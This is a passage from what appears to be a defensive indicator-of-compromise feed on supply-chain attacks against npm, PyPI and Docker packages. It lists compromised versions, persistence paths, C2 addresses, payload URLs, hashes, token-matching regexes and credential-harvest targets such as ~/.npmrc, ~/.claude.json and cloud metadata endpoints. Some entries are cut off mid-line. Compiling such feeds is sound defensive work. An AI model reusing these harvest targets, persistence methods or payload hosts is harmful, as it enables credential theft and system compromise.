{"value": "@openwebconcept/[email protected]",
"note": "CanisterSprawl (Apr 21)", "incident":
"canistersprawl"},
{"value": "@openwebconcept/[email protected]",
"note": "CanisterSprawl (Apr 21)", "incident":
"canistersprawl"},
{"value": "@cap-js/[email protected]", "note":
"SAP package (~250k/wk)", "incident":
"mini-shai-hulud"},
{"value": "@cap-js/[email protected]",
"note": "SAP package (~10k/wk)", "incident":
"mini-shai-hulud"},
{"value": "@cap-js/[email protected]",
"note": "SAP package (~260k/wk)", "incident":
"mini-shai-hulud"},
{"value": "[email protected]", "note": "SAP
build tool (~52k/wk)", "incident": "mini-shai-hulud"},
{"value": "[email protected]", "note":
"cross-ecosystem spread", "incident":
"mini-shai-hulud"},
{"value": "@tanstack/[email protected]",
"note": "12M weekly downloads", "incident":
"mini-shai-hulud-2"},
{"value": "@tanstack/[email protected]",
"note": "12M weekly downloads", "incident":
"mini-shai-hulud-2"},
{"value": "@tanstack/[email protected]",
"note": "TanStack router core", "incident":
"mini-shai-hulud-2"},
{"value": "@tanstack/[email protected]",
"note": "TanStack router core", "incident":
"mini-shai-hulud-2"},
{"value": "@tanstack/*", "note": "40+
packages compromised", "incident":
"mini-shai-hulud-2"},
{"value": "@tanstack/[email protected]",
"note": "infected Nx Console contributor (2.3 MB obfuscated
harvester)", "source": "Nx Postmortem", "incident":
"mini-shai-hulud-2"},
{"value": "@uipath/*", "note": "70+
packages compromised", "incident":
"mini-shai-hulud-2"},
{"value": "@uipath/[email protected]",
"note": "UiPath enterprise automation",
"incident": "mini-shai-hulud-2"},
{"value": "@uipath/[email protected]", "note":
"UiPath CLI", "incident": "mini-shai-hulud-2"},
{"value": "@uipath/[email protected]",
"note": "UiPath agent SDK", "incident":
"mini-shai-hulud-2"},
{"value": "@mistralai/[email protected]",
"note": "Mistral AI TypeScript client",
"incident": "mini-shai-hulud-2"},
{"value": "@mistralai/[email protected]",
"note": "Mistral AI TypeScript client",
"incident": "mini-shai-hulud-2"},
{"value": "@mistralai/[email protected]",
"note": "Mistral AI TypeScript client",
"incident": "mini-shai-hulud-2"},
{"value": "@mistralai/[email protected]",
"note": "Mistral AI Azure client", "incident":
"mini-shai-hulud-2"},
{"value": "@mistralai/[email protected]",
"note": "Mistral AI Azure client", "incident":
"mini-shai-hulud-2"},
{"value": "@mistralai/[email protected]",
"note": "Mistral AI Azure client", "incident":
"mini-shai-hulud-2"},
{"value": "@mistralai/[email protected]",
"note": "Mistral AI GCP client", "incident":
"mini-shai-hulud-2"},
{"value": "@mistralai/[email protected]",
"note": "Mistral AI GCP client", "incident":
"mini-shai-hulud-2"},
{"value": "@mistralai/[email protected]",
"note": "Mistral AI GCP client", "incident":
"mini-shai-hulud-2"},
{"value": "@antv/*", "note": "323
packages compromised (639 versions)", "incident":
"antv"},
{"value": "@antv/[email protected]", "note":
"charting library", "incident": "antv"},
{"value": "@antv/[email protected]", "note":
"charting library", "incident": "antv"},
{"value": "@antv/g6", "note": "graph
visualization", "incident": "antv"},
{"value": "@antv/x6", "note":
"diagramming", "incident": "antv"},
{"value": "@antv/l7", "note":
"geospatial visualization", "incident": "antv"},
{"value": "@antv/s2", "note":
"multidimensional analytics", "incident":
"antv"},
{"value": "@antv/f2", "note": "mobile
charts", "incident": "antv"},
{"value": "@antv/g", "note":
"rendering engine", "incident": "antv"},
{"value": "@antv/g2plot", "note":
"chart library", "incident": "antv"},
{"value": "@antv/graphin", "note":
"graph analysis", "incident": "antv"},
{"value": "@antv/data-set", "note":
"data processing", "incident": "antv"},
{"value": "@antv/[email protected]", "note":
"scale utilities (~2.2M weekly)", "incident":
"antv"},
{"value": "@antv/[email protected]", "note":
"scale utilities", "incident": "antv"},
{"value": "[email protected]",
"note": "~1.1M weekly downloads", "incident":
"antv"},
{"value": "[email protected]",
"note": "~1.1M weekly downloads", "incident":
"antv"},
{"value": "[email protected]",
"note": "~1.1M weekly downloads", "incident":
"antv"},
{"value": "[email protected]", "note":
"~1.15M weekly downloads", "incident": "antv"},
{"value": "[email protected]", "note":
"~1.15M weekly downloads", "incident": "antv"},
{"value": "[email protected]", "note":
"~4.2M monthly downloads", "incident": "antv"},
{"value": "[email protected]", "note":
"~4.2M monthly downloads", "incident": "antv"},
{"value": "[email protected]", "note":
"~4.2M monthly downloads", "incident": "antv"},
{"value": "canvas-nest.js", "note":
"canvas animation", "incident": "antv"},
{"value": "jest-canvas-mock", "note":
"testing utility", "incident": "antv"},
{"value": "jest-date-mock", "note":
"testing utility", "incident": "antv"}
],
"vscode_extensions": [
{"value": "[email protected]",
"note": "Nx Console (2.2M installs, 11-min exposure)",
"incident": "antv"}
],
"packagist_packages": [
{"value": "intercom/[email protected]",
"note": "first npm→Packagist spread (20.7M lifetime)",
"incident": "mini-shai-hulud"}
]
},
"malware":
{
"attribution_strings": [
{"value": "TeamPCP Cloud stealer", "note":
"self-attribution", "incident": ["trivy",
"checkmarx", "litellm"]},
{"value": "tpcp.tar.gz", "note":
"exfil bundle", "incident": ["trivy",
"checkmarx", "litellm"]},
{"value": "tpcp-docs", "note":
"GitHub dead drop", "incident": ["trivy",
"checkmarx", "litellm"]},
{"value": "System Telemetry Service",
"note": "systemd unit display name", "incident":
"litellm"},
{"value": "Runner.Worker", "note":
"memory scrape target", "incident": "trivy"},
{"value": "# hacked by teampcp", "note":
"xinference comment marker (disputed)", "incident":
"xinference"},
{"value": "love.tar.gz", "note":
"xinference exfil bundle", "incident":
"xinference"},
{"value": "X-QT-SR: 14", "note":
"xinference exfil HTTP header", "incident":
"xinference"},
{"value": "Shai-Hulud: The Third Coming",
"note": "Bitwarden payload identifier",
"incident": "bitwarden"},
{"value": "A Mini Shai-Hulud has Appeared",
"note": "GitHub repo description", "incident":
"mini-shai-hulud"},
{"value": "OhNoWhatsGoingOnWithGitHub",
"note": "GitHub commit search marker",
"incident": "mini-shai-hulud"},
{"value": "EveryBoiWeBuildIsAWormyBoi",
"note": "PyTorch Lightning search marker",
"incident": "mini-shai-hulud"},
{"value": "beautifulcastle", "note":
"KICS binary fallback C2 URL resolution", "incident":
["kics-docker", "bitwarden", "mini-shai-hulud"]},
{"value": "LongLiveTheResistanceAgainstMachines",
"note": "VSCode payload fallback GitHub token acquisition",
"incident": ["kics-docker", "bitwarden"]},
{"value": "KICS-Telemetry/2.0", "note":
"User-Agent for KICS exfil", "incident":
"kics-docker"},
{"value": "claude
commit author", "incident": "mini-shai-hulud"},
{"value": "chore: update dependencies",
"note": "malicious commit message", "incident":
"mini-shai-hulud"},
{"value": "dependabout", "note":
"typosquat branch name (dependabot misspelling)",
"incident": "mini-shai-hulud"},
{"value": "firedalazer", "note":
"GitHub dead-drop C2 trigger keyword", "incident":
"antv"},
{"value": "niagA oG eW ereH :duluH-iahS",
"note": "exfil repo description (reversed: Shai-Hulud: Here We
Go Again)", "incident": "antv"},
{"value": "python-requests/2.31.0",
"note": "spoofed User-Agent for GitHub API calls",
"incident": "antv"},
{"value": "python-httpx/0.28.1", "note":
"attacker User-Agent (May 15 return visit)", "source":
"Nx Postmortem", "incident": "antv"},
{"value": "Run Copilot", "note":
"injected workflow name", "incident": "antv"},
{"value": "Build action for vX.Y.Z",
"note": "imposter commit message pattern (actions-cool)",
"incident": "antv"},
{"value": "New Package", "note":
"imposter commit message (antvis/G2, forged author huiyu.zjt)",
"incident": "antv"},
{"value": "format-results", "note":
"artifact name for secrets dump", "incident":
"antv"}
],
"persistence_paths": [
{"value": "~/.config/systemd/user/sysmon.py",
"note": "developer machines", "incident":
"litellm"},
{"value": "~/.config/sysmon/sysmon.js",
"note": "checkmarx-util via VSCode ext",
"incident": "checkmarx"},
{"value":
"/root/.config/systemd/user/sysmon.service", "note":
"KICS systemd", "incident": "checkmarx"},
{"value": "/var/lib/svc_internal/runner.py",
"note": "kamikaze v1", "incident":
["trivy", "canisterworm"]},
{"value":
"/etc/systemd/system/internal-monitor.service", "note":
"kamikaze v1", "incident": ["trivy",
"canisterworm"]},
{"value": "/var/lib/pgmon/pgmon.py",
"note": "kamikaze v3 worm", "incident":
["trivy", "canisterworm"]},
{"value": "/etc/systemd/system/pgmonitor.service",
"note": "kamikaze v3 worm", "incident":
["trivy", "canisterworm"]},
{"value": "~/.config/systemd/user/pgmon.service",
"note": "CanisterWorm npm", "incident":
"canisterworm"},
{"value": "~/.local/share/pgmon/service.py",
"note": "CanisterWorm backdoor", "incident":
"canisterworm"},
{"value": "~/.npmrc", "note":
"harvested for npm tokens", "incident":
"canisterworm"},
{"value": "/etc/npmrc", "note":
"harvested for npm tokens", "incident":
"canisterworm"},
{"value": "/tmp/.pg_state", "note":
"state tracking", "incident": ["trivy",
"canisterworm"]},
{"value": "/tmp/pglog", "note": "temp
staging", "incident": ["trivy",
"canisterworm"]},
{"value": "%APPDATA%\\Microsoft\\Windows\\Start
Menu\\Programs\\Startup\\msbuild.exe", "note": "Telnyx
Windows dropper (AdaptixC2)", "incident": "telnyx"},
{"value": "%APPDATA%\\Microsoft\\Windows\\Start
Menu\\Programs\\Startup\\msbuild.exe.lock", "note": "lock
file (12hr re-infection guard)", "incident": "telnyx"},
{"value": "dllhost.exe (spawned suspended)",
"type": "string", "note": "injection
target", "incident": "telnyx"},
{"value": "\\\\.\\pipe\\%08lx", "type":
"string", "note": "named pipe fallback C2",
"incident": "telnyx"},
{"value": "~/.config/audiomon/audiomon.py",
"note": "Telnyx Linux backdoor", "incident":
"telnyx"},
{"value": "~/.config/systemd/user/audiomon.service",
"note": "Telnyx Linux persistence", "incident":
"telnyx"},
{"value": "/tmp/.initd_state", "note":
"Telnyx state tracking", "incident": "telnyx"},
{"value": ".claude/router_runtime.js",
"note": "Mini Shai Hulud payload", "incident":
"mini-shai-hulud"},
{"value": ".claude/setup.mjs", "note":
"Mini Shai Hulud dropper", "incident":
"mini-shai-hulud"},
{"value": ".claude/settings.json", "note":
"SessionStart hook persistence", "incident":
"mini-shai-hulud"},
{"value": "~/.claude.json", "note":
"credential harvest target", "incident":
"bitwarden"},
{"value": "~/.kiro/settings/mcp.json",
"note": "credential harvest target", "incident":
"bitwarden"},
{"value": ".vscode/setup.mjs", "note":
"VS Code dropper", "incident":
"mini-shai-hulud"},
{"value": ".vscode/tasks.json", "note":
"folderOpen task persistence", "incident":
"mini-shai-hulud"},
{"value": "results/results-*.json",
"note": "exfil staging", "incident":
"mini-shai-hulud"},
{"value": "/tmp/tmp.987654321.lock",
"note": "instance lock file", "incident":
"mini-shai-hulud"},
{"value": "~/.config/gh/hosts.yml",
"note": "GitHub CLI token target (exercised within 74s)",
"source": "Nx Postmortem", "incident": ["mini-shai-hulud-2",
"antv"]},
{"value": "~/.local/share/kitty/cat.py",
"note": "Python backdoor (GitHub dead-drop C2)",
"incident": "antv"},
{"value":
"~/Library/LaunchAgents/com.user.kitty-monitor.plist",
"note": "macOS persistence (hourly trigger)",
"incident": "antv"},
{"value":
"~/.config/systemd/user/kitty-monitor.service", "note":
"Linux persistence", "incident": "antv"},
{"value": "/var/tmp/.gh_update_state",
"note": "anti-replay state file", "incident":
"antv"},
{"value": "/tmp/kitty-*", "note":
"staging directories", "incident": "antv"},
{"value": "~/.local/bin/gh-token-monitor.sh",
"note": "token polling daemon (60s interval)",
"incident": "antv"},
{"value": ".github/workflows/codeql.yml",
"note": "injected workflow (Run Copilot)",
"incident": "antv"},
{"value": "/tmp/managed.pyz", "note":
"initial payload", "incident": "durabletask"},
{"value": "/tmp/rope-*.pyz", "note":
"secondary payload", "incident": "durabletask"},
{"value": "~/.cache/.sys-update-check",
"note": "general infection marker", "incident":
"durabletask"},
{"value": "~/.cache/.sys-update-check-k8s",
"note": "Kubernetes infection marker",
"incident": "durabletask"},
{"value": "/tmp/.rope_state/ssm_instances.json",
"note": "SSM target tracking", "incident":
"durabletask"},
{"value": "/etc/systemd/system/pcpcat-gost.service",
"note": "SOCKS5 proxy persistence", "source":
"Rubrik Zero Labs", "incident": "pcpcat"},
{"value": "/etc/systemd/system/pcpcat-frp.service",
"note": "FRP tunnel persistence", "source":
"Rubrik Zero Labs", "incident": "pcpcat"},
{"value":
"/etc/systemd/system/pcpcat-scanner.service", "note":
"Docker/Ray scanner persistence", "source": "Rubrik
Zero Labs", "incident": "pcpcat"},
{"value":
"/etc/systemd/system/pcpcat-react.service", "note":
"CVE-2025-55182 scanner persistence", "source":
"Rubrik Zero Labs", "incident": "pcpcat"},
{"value":
"/etc/systemd/system/pcpcat-redis.service", "note":
"Redis exploit persistence", "source": "Rubrik Zero
Labs", "incident": "pcpcat"},
{"value":
"/etc/systemd/system/pcpcat-boring.service", "note":
"XMRig miner persistence", "source": "Rubrik Zero
Labs", "incident": "pcpcat"},
{"value": "/etc/cron.d/teampcp", "note":
"hourly proxy.sh cron", "source": "Rubrik Zero
Labs", "incident": "pcpcat"}
],
"injected_files": [
{"value": "cmd/trivy/main.go", "note":
"Trivy injection", "incident": "trivy"},
{"value": "cmd/trivy/scand.go", "note":
"Trivy injection", "incident": "trivy"}
],
"kubernetes": [
{"value": "host-provisioner-std", "note":
"DaemonSet", "incident": ["trivy",
"canisterworm"]},
{"value": "host-provisioner-iran", "note":
"DaemonSet (wiper)", "incident": ["trivy",
"canisterworm"]},
{"value": "kamikaze", "note":
"Container (hostPID: true)", "incident":
["trivy", "canisterworm"]},
{"value": "provisioner", "note":
"Container name", "incident": ["trivy",
"canisterworm"]},
{"value": "node-setup-*", "note":
"Privileged pod pattern", "incident": "litellm"},
{"value": "alpine:latest", "note":
"Image for host filesystem mount", "incident":
["litellm", "pcpcat"]},
{"value": "system-monitor", "note":
"DaemonSet in kube-system (hostNetwork, hostPID, privileged)",
"source": "Rubrik Zero Labs", "incident":
"pcpcat"},
{"value": "teampcp", "note": "Docker
container name (privileged, host network)", "source":
"Rubrik Zero Labs", "incident": "pcpcat"}
],
"network_behavior": [
{"value": "Scans ports 22, 2375 on local /24",
"note": "worm behavior", "incident":
["trivy", "canisterworm"]},
{"value": "/var/log/auth.log", "type":
"path", "note": "parsed for targets",
"incident": ["trivy", "canisterworm"]},
{"value": "youtube.com connectivity check",
"type": "string", "note": "kill switch
(50-min poll)", "incident": ["canisterworm", "litellm"]},
{"value": "POST /telemetry/checkmarx.json",
"type": "string", "note": "AdaptixC2 beacon
URI", "incident": "telnyx"},
{"value": "X-Content-ID header", "type":
"string", "note": "AdaptixC2 session header",
"incident": "telnyx"},
{"value": "Mozilla/5.0 (Windows NT 6.2; rv:20.0)
Gecko/20121202 Firefox/20.0", "type": "string",
"note": "AdaptixC2 User-Agent", "incident":
"telnyx"},
{"value": "Russian locale exit", "type":
"string", "note": "CIS avoidance — exits if ru_*
locale detected", "incident": ["bitwarden",
"mini-shai-hulud"]},
{"value": "POST /v1/telemetry", "type":
"string", "note": "Mini Shai Hulud exfil URI",
"incident": "mini-shai-hulud"},
{"value": "GitHub GraphQL API commit search",
"type": "string", "note": "dead-drop token
retrieval", "incident": "mini-shai-hulud"},
{"value": "bun run index.js", "type":
"string", "note": "preinstall hook trigger",
"incident": "antv"},
{"value": "/proc/
"type": "string", "note": "Runner.Worker
memory scraping", "incident": "antv"},
{"value": "169.254.169.254", "type":
"ip", "note": "AWS IMDS credential harvest",
"incident": "antv"},
{"value": "169.254.170.2", "type":
"ip", "note": "ECS container metadata harvest",
"incident": "antv"},
{"value": "127.0.0.1:8200", "type":
"url", "note": "Vault token harvest",
"incident": "antv"},
{"value": "gh[op]_[A-Za-z0-9]{36,}",
"type": "regex", "note": "GitHub PAT
pattern", "incident": "antv"},
{"value": "npm_[A-Za-z0-9]{36,}", "type":
"regex", "note": "npm token pattern",
"incident": "antv"},
{"value":
"registry.npmjs.org/-/npm/v1/oidc/token/exchange/package/",
"type": "url", "note": "npm OIDC token
exchange abuse", "incident": "antv"},
{"value": "runner ALL=(ALL) NOPASSWD:ALL",
"type": "string", "note": "sudoers privilege
escalation", "incident": "antv"},
{"value": "__DAEMONIZED=1", "type":
"envvar", "note": "persistence guard",
"incident": "antv"},
{"value": "NEXT_REDIRECT error exfil",
"type": "string", "note": "CVE-2025-55182
output exfil via X-Action-Redirect", "source": "Rubrik Zero
Labs", "incident": "pcpcat"}
],
"_dune_repo_pattern":
"
sardaukar-melange-472)",
"dune_repo_words": [
{"value": "sardaukar", "incident":
["mini-shai-hulud", "antv"]},
{"value": "mentat", "incident":
["mini-shai-hulud", "antv"]},
{"value": "fremen", "incident":
["mini-shai-hulud", "antv"]},
{"value": "atreides", "incident":
["mini-shai-hulud", "antv"]},
{"value": "harkonnen", "incident":
["mini-shai-hulud", "antv"]},
{"value": "gesserit", "incident":
["mini-shai-hulud", "antv"]},
{"value": "prescient", "incident":
["mini-shai-hulud", "antv"]},
{"value": "fedaykin", "incident":
["mini-shai-hulud", "antv"]},
{"value": "tleilaxu", "incident":
["mini-shai-hulud", "antv"]},
{"value": "siridar", "incident":
["mini-shai-hulud", "antv"]},
{"value": "kanly", "incident":
["mini-shai-hulud", "antv"]},
{"value": "sayyadina", "incident":
["mini-shai-hulud", "antv"]},
{"value": "ghola", "incident":
["mini-shai-hulud", "antv"]},
{"value": "powindah", "incident":
["mini-shai-hulud", "antv"]},
{"value": "prana", "incident":
["mini-shai-hulud", "antv"]},
{"value": "kralizec", "incident":
["mini-shai-hulud", "antv"]},
{"value": "sandworm", "incident":
"antv"},
{"value": "ornithopter", "incident":
"antv"},
{"value": "heighliner", "incident":
"antv"},
{"value": "stillsuit", "incident":
"antv"},
{"value": "lasgun", "incident":
"antv"},
{"value": "sietch", "incident":
"antv"},
{"value": "melange", "incident":
"antv"},
{"value": "thumper", "incident":
"antv"},
{"value": "navigator", "incident":
"antv"},
{"value": "futar", "incident":
"antv"},
{"value": "phibian", "incident":
"antv"},
{"value": "slig", "incident":
"antv"},
{"value": "cogitor", "incident":
"antv"},
{"value": "laza", "incident":
"antv"}
]
}
}
Canisterworm
Network
Indicators- 5
cloudflare tunnels
souls-entire-defined-routes.trycloudflare.com
investigation-launches-hearings-copying.trycloudflare.com
championships-peoples-point-cassette.trycloudflare.com
create-sensitivity-grad-sequence.trycloudflare.com
icp
canister
tdtqy-oyaaa-aaaae-af2dq-cai.raw.icp0.io
File
Hashes- 7
canisterworm
malware
e9b1e069efc778c1e77fb3f5fcc3bd3580bbc810604cbf4347897ddb4b8c163b
61ff00a81b19624adaad425b9129ba2f312f4ab76fb5ddc2c628a5037d31a4ba
0c0d206d5e68c0cf64d57ffa8bc5b1dad54f2dda52f24e96e02e237498cb9c3a
c37c0ae9641d2e5329fcdee847a756bf1140fdb7f0b7c78a40fdc39055e7d926
f398f06eefcd3558c38820a397e3193856e4e6e7c67f81ecc8e533275284b152
7df6cef7ab9aae2ea08f2f872f6456b5d51d896ddda907a238cd6668ccdc4bb7
5e2ba7c4c53fa6e0cef58011acdd50682cf83fb7b989712d2fcf1b5173bad956
GitHub
Artifacts- 6
npm
packages
@EmilGroup/*
@opengov/*
@teale.io/[email protected]
@teale.io/[email protected]
@airtm/uuid-base32
@pypestream/floating-ui-dom
Malware
Signatures-
17
persistence
paths
/var/lib/svc_internal/runner.py
/etc/systemd/system/internal-monitor.service
/var/lib/pgmon/pgmon.py
/etc/systemd/system/pgmonitor.service
~/.config/systemd/user/pgmon.service
~/.local/share/pgmon/service.py
~/.npmrc
/etc/npmrc
/tmp/.pg_state
/tmp/pglog
kubernetes
host-provisioner-std
host-provisioner-iran
kamikaze
provisioner
network
behavior
Scans ports 22, 2375 on local /24
/var/log/auth.log
youtube.com connectivity check
Payload
Repositories
- litellm_1.82.8 —
3-stage payload w/ RSA-4096 key - litellm_1.82.7 —
RC4 obfuscation variants - telnyx_4.87.1 —
WAV steganography delivery - MalwareBazaar —
Community samples + YARA
Canistersprawl
Network
Indicators- 5
icp
canister
cjn37-uyaaa-aaaac-qgnva-cai.raw.icp0.io
canistersprawl c2
telemetry.api-monitor.com
canistersprawl hashes
c19c4574d09e60636425f9555d3b63e8cb5c9d63ceb1c982c35e5a310c97a839
834b6e5db5710b9308d0598978a0148a9dc832361f1fa0b7ad4343dcceba2812
87259b0d1d017ad8b8daa7c177c2d9f0940e457f8dd1ab3abab3681e433ca88e
GitHub
Artifacts- 6
npm
packages
@automagik/[email protected]
@fairwords/[email protected]
@fairwords/[email protected]
@openwebconcept/[email protected]
@openwebconcept/[email protected]
Payload
Repositories
- litellm_1.82.8 —
3-stage payload w/ RSA-4096 key - litellm_1.82.7 —
RC4 obfuscation variants - telnyx_4.87.1 —
WAV steganography delivery - MalwareBazaar —
Community samples + YARA
Checkmarx
Network
Indicators- 2
kics c2
checkmarx.zone
83.142.209.11
File
Hashes- 4
kics openvsx
527f795a201a6bc114394c4cfd1c74dce97381989f51a4661aafbc93a4439e90
65bd72fcddaf938cefdf55b3323ad29f649a65d4ddd6aea09afa974dfc7f105d
744c9d61b66bcd2bb5474d9afeee6c00bb7e0cd32535781da188b80eb59383e0
0d66d8c7e02574ff0d3443de0585af19c903d12466d88573ed82ec788655975c
GitHub
Artifacts- 4
checkmarx
actions
Checkmarx/kics-github-action @ 121c38f
Checkmarx/ast-github-action @ aa52a82c
compromised
accounts
cx-plugins-releases
ast-phoenix
Malware
Signatures-
5
attribution
strings
TeamPCP Cloud stealer
tpcp.tar.gz
tpcp-docs
persistence
paths
~/.config/sysmon/sysmon.js
/root/.config/systemd/user/sysmon.service
Payload
Repositories
- litellm_1.82.8 —
3-stage payload w/ RSA-4096 key - litellm_1.82.7 —
RC4 obfuscation variants - telnyx_4.87.1 —
WAV steganography delivery - MalwareBazaar —
Community samples + YARA
Litellm
Network
Indicators- 6
kics c2
checkmarx.zone
litellm c2
models.litellm.cloud
litellm.cloud
46.151.182.203
manpages.wtf
elementary
data markers
050afbe046d7545f5af1a0d3fcfbaf6e993fd93d487b431f09bc9e963c7220a135
File
Hashes- 7
litellm
packages
8395c3268d5c5dbae1c7c6d4bb3c318c752ba4608cfcd90eb97ffb94a910eac2
d2a0d5f564628773b6af7b9c11f6b86531a875bd2d186d7081ab62748a800ebb
8a2a05fd8bdc329c8a86d2d08229d167500c01ecad06e40477c49fb0096efdea
d39f4e7a218053cce976c91eacf184cf09a6960c731cc9d66d8e1a53406593a5
litellm malware
a0d229be8efcb2f9135e2ad55ba275b76ddcfeb55fa4370e0a522a5bdee0120b
71e35aef03099cd1f2d6446734273025a163597de93912df321ef118bf135238
6cf223aea68b0e8031ff68251e30b6017a0513fe152e235c26f248ba1e15c92a
GitHub
Artifacts- 4
litellm exfil
BerriAI/litellm @ fcaa823d
BerriAI/litellm-skills @ 81c851cc
pypi
packages
litellm==1.82.7
litellm==1.82.8
Malware
Signatures- 8
attribution
strings
TeamPCP Cloud stealer
tpcp.tar.gz
tpcp-docs
System Telemetry Service
persistence
paths
~/.config/systemd/user/sysmon.py
kubernetes
node-setup-*
alpine:latest
network
behavior
youtube.com connectivity check
Payload
Repositories
- litellm_1.82.8 —
3-stage payload w/ RSA-4096 key - litellm_1.82.7 —
RC4 obfuscation variants - telnyx_4.87.1 —
WAV steganography delivery - MalwareBazaar —
Community samples + YARA
Telnyx
Network
Indicators- 3
telnyx c2
83.142.209.203
wav
delivery
83.142.209.203:8080/hangup.wav
83.142.209.203:8080/ringtone.wav
File
Hashes- 17
litellm
malware
6cf223aea68b0e8031ff68251e30b6017a0513fe152e235c26f248ba1e15c92a
telnyx
packages
7321caa303fe96ded0492c747d2f353c4f7d17185656fe292ab0a59e2bd0b8d9
f66c1ea3b25ec95d0c6a07be92c761551e543a7b256f9c78a2ff781c77df7093
cd08115806662469bbedec4b03f8427b97c8a4b3bc1442dc18b72b4e19395fe3
a9235c0eb74a8e92e5a0150e055ee9dcdc6252a07785b6677a9ca831157833a5
telnyx malware
23b1ec58649170650110ecad96e5a9490d98146e105226a16d898fbe108139e5
ab4c4aebb52027bf3d2f6b2dcef593a1a2cff415774ea4711f7d6e0aa1451d4e
84edce66f09c55bbb44754411bde4b092288d172734df62fac20d6f794b3a2ec
5ce544a8db5d0b0953c966384858e4e8a017e7acba2f5f6d0ac8f529d59939d8
196b5e0e06424a02e360e28e08d7dcfab7ec8946af9477ca352c6cf6b7d4e9bd
e6912e3ec58120bf63edf2e4be6ff2f092c40cfbc655a12f4a463b2ef98d368e
e4e3b176c1255666024d90392e09466a23bf6e8740bf589c6d1ccf2dfff451a4
windows payload
7290353a3bc2b18e9ea574d3294b09e28edaa6b038285bb101cf09760f187dcd
dafc1cc5d39bc303562d8587b698b6351e843b77c01764efa8b423a36b88fa6d
7e270255567866d37ad56e3f06977b695e39530eede74a10a0848ba71560cb45
b92bd082bbd7d238089b2bb87d9cbf01be1bf8ab7213b67e9d27108e052ef75c
26b689749bc57991cbae2aab8ab6cf5acab6c64db4829ba2b1ced6c60d99a7a8
GitHub Artifacts- 2
pypi packages
telnyx==4.87.1
telnyx==4.87.2
Malware
Signatures- 10
persistence
paths
%APPDATA%\Microsoft\Windows\Start
Menu\Programs\Startup\msbuild.exe
%APPDATA%\Microsoft\Windows\Start
Menu\Programs\Startup\msbuild.exe.lock
dllhost.exe (spawned suspended)
\\.\pipe\%08lx
~/.config/audiomon/audiomon.py
~/.config/systemd/user/audiomon.service
/tmp/.initd_state
network
behavior
POST /telemetry/checkmarx.json
X-Content-ID header
Mozilla/5.0 (Windows NT 6.2; rv:20.0) Gecko/20121202
Firefox/20.0
Payload
Repositories
- litellm_1.82.8 —
3-stage payload w/ RSA-4096 key - litellm_1.82.7 —
RC4 obfuscation variants - telnyx_4.87.1 —
WAV steganography delivery - MalwareBazaar —
Community samples + YARA
Attacker
Network
Indicators- 16
attacker
ops
170.62.100.245
209.159.147.239
154.47.29.12
103.75.11.59
nsa.cat
105.245.181.120
138.199.15.172
163.245.223.12
185.77.218.4
193.32.126.157
23.234.107.104
34.205.27.48
staging
server
43.228.157.123
43.228.157.123/MidwestGrey.exe
43.228.157.123/kfhogts
43.228.157.123/oqqqqoa.mp3
File
Hashes- 5
staging server malware
81eda518ff6ebb25e6aa8d626b78cd2eb6cb38b5d7efb34e021289e76993414b
ea47cebe2fbbf06c22b9bd9b9d72dd4fe64aed4e68675aa5e693312a773e09e9
certificates
30015dd1e2cf4dbd49fff9ddef2ad4622da2e60e5c0b6228595325532e948f14
41c4f2f37c0b257d1e20fe167f2098da9d2e0a939b09ed3f63bc4fe010f8365c
d8caf4581c9f0000c7568d78fb7d2e595ab36134e2346297d78615942cbbd727
Payload
Repositories
- litellm_1.82.8 —
3-stage payload w/ RSA-4096 key - litellm_1.82.7 —
RC4 obfuscation variants - telnyx_4.87.1 —
WAV steganography delivery - MalwareBazaar —
Community samples + YARA
Kics-docker
Network
Indicators- 2
april
c2
94.154.172.43
audit.checkmarx.cx
File
Hashes- 5
kics
docker april
24680027afadea90c7c713821e214b15cb6c922e67ac01109fb1edb3ee4741d9
2a6a35f06118ff7d61bfd36a5788557b695095e7c9a609b4a01956883f146f50
kics
docker digests
sha256:2588a44890263a8185bd5d9fadb6bc9220b60245dbcbc4da35e1b62a6f8c230d
sha256:222e6bfed0f3bb1937bf5e719a2342871ccd683ff1c0cb967c8e31ea58beaf7b
sha256:a0d9366f6f0166dcbf92fcdc98e1a03d2e6210e8d7e8573f74d50849130651a0
GitHub
Artifacts- 7
checkmarx
actions
Checkmarx/kics @ 22769adb
Checkmarx/ast-github-action PR#307
container
images
docker.io/checkmarx/kics:latest
docker.io/checkmarx/kics:v2.1.20
docker.io/checkmarx/kics:v2.1.21
docker.io/checkmarx/kics:alpine
docker.io/checkmarx/kics:Debian
Malware
Signatures- 3
attribution
strings
beautifulcastle
LongLiveTheResistanceAgainstMachines
KICS-Telemetry/2.0
Payload
Repositories
- litellm_1.82.8 —
3-stage payload w/ RSA-4096 key - litellm_1.82.7 —
RC4 obfuscation variants - telnyx_4.87.1 —
WAV steganography delivery - MalwareBazaar —
Community samples + YARA
Bitwarden
Network Indicators- 2
april c2
94.154.172.43
audit.checkmarx.cx
File Hashes- 4
bitwarden cli
18f784b3bc9a0bcdcb1a8d7f51bc5f54323fc40cbd874119354ab609bef6e4cb
f35475829991b303c5efc2ee0f343dd38f8614e8b5e69db683923135f85cf60d
8605e365edf11160aad517c7d79a3b26b62290e5072ef97b102a01ddbb343f14
167ce57ef59a32a6a0ef4137785828077879092d7f83ddbc1755d6e69116e0ad
GitHub Artifacts- 2
compromised accounts
aDrupont4191
npm packages
@bitwarden/[email protected]
Malware Signatures- 6
attribution strings
Shai-Hulud: The Third Coming
beautifulcastle
LongLiveTheResistanceAgainstMachines
persistence paths
~/.claude.json
~/.kiro/settings/mcp.json
network behavior
Russian locale exit
Payload Repositories
- litellm_1.82.8 —
3-stage payload w/ RSA-4096 key - litellm_1.82.7 —
RC4 obfuscation variants - telnyx_4.87.1 —
WAV steganography delivery - MalwareBazaar —
Community samples + YARA
Xinference
Network
Indicators- 1
april
c2
whereisitat.lucyatemysuperbox.space
File
Hashes- 3
xinference packages
9d5bf42dedbefee145b9b3704d26b54668fd856f990299ec64f6b45b18e3f0bf
96938e023f9ab0e963201522729a77e826b7bf336b1e5c972be76f8438ea4c1b
06c88b286610e397ad22b8453b75ebf1e7bfe3b22c558577e17c39f21ef78a9c
GitHub
Artifacts- 4
compromised
accounts
XprobeBot
pypi
packages
xinference==2.6.0
xinference==2.6.1
xinference==2.6.2
Malware
Signatures- 3
attribution
strings
# hacked by teampcp
love.tar.gz
X-QT-SR: 14
Payload
Repositories
- litellm_1.82.8 —
3-stage payload w/ RSA-4096 key - litellm_1.82.7 —
RC4 obfuscation variants - telnyx_4.87.1 —
WAV steganography delivery - MalwareBazaar —
Community samples + YARA
Mini-shai-hulud
Network
Indicators- 1
april
c2
zero.masscan.cloud
File
Hashes- 18
mini
shai hulud dropper
